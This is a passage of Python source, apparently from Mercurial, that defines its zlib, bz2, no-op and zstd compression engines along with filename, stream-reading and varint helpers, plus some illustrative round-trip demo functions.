                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

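# Illustrative sketch (editor's addition): streaming a payload through the
# zlib engine's compressstream()/decompressorreader() pair.
def _demo_zlib_engine_roundtrip():
    import io
    engine = compengines['zlib']
    payload = b'chunk one chunk two chunk three'
    compressed = b''.join(engine.compressstream(iter([payload])))
    reader = engine.decompressorreader(io.BytesIO(compressed))
    assert reader.read(len(payload)) == payload
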
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled
    # elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

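# Illustrative sketch (editor's addition): a revlog-style round trip through
# the zstd engine, guarded because the bundled zstd module is optional.
def _demo_zstd_revlog_roundtrip():
    engine = compengines['zstd']
    if not engine.available():
        return
    compressor = engine.revlogcompressor()
    data = b'revlog chunk ' * 100
    compressed = compressor.compress(data)
    # compress() returns None when compression would not save space.
    if compressed is not None:
        assert compressor.decompress(compressed) == data
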
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

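# Illustrative sketch (editor's addition): registration is unconditional, so
# the manager always knows all four public bundle names, while the help topics
# built above additionally filter out engines that can't be loaded.
def _demo_bundle_names():
    assert compengines.supportedbundlenames == {'gzip', 'bzip2', 'none',
                                                'zstd'}
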
# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

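# Illustrative sketch (editor's addition): since safename() only needs
# membership tests, a plain set can stand in for a real context here.
def _demo_safename():
    taken = {'foo~merge', 'foo~merge~1'}
    assert safename('foo', 'merge', taken) == 'foo~merge~2'
    assert safename('bar', 'merge', taken) == 'bar~merge'
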
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

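# Illustrative sketch (editor's addition): readexactly() either returns the
# full count requested or raises error.Abort; it never returns a short read.
def _demo_readexactly():
    import io
    assert readexactly(io.BytesIO(b'abcdef'), 4) == b'abcd'
    try:
        readexactly(io.BytesIO(b'ab'), 4)
    except error.Abort:
        pass  # got 2 bytes, expected 4
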
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's value, least significant group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

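# Worked example (editor's addition): 1337 is 0b10100111001. Split from the
# least significant end into 7-bit groups 0111001 (0x39) and 0001010 (0x0a).
# Every byte but the last carries the continuation bit, so the encoding is
# (0x80 | 0x39) = 0xb9 followed by 0x0a, matching the doctest above.
def _demo_uvarint_bytes():
    assert uvarintencode(1337) == b'\xb9\x0a'
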
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
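
# Illustrative sketch (editor's addition): encoding and decoding are inverse
# operations, so any non-negative integer survives a round trip.
def _demo_uvarint_roundtrip():
    import io
    for value in (0, 1, 127, 128, 1337, 65536, 2 ** 42):
        encoded = uvarintencode(value)
        assert uvarintdecodestream(io.BytesIO(encoded)) == value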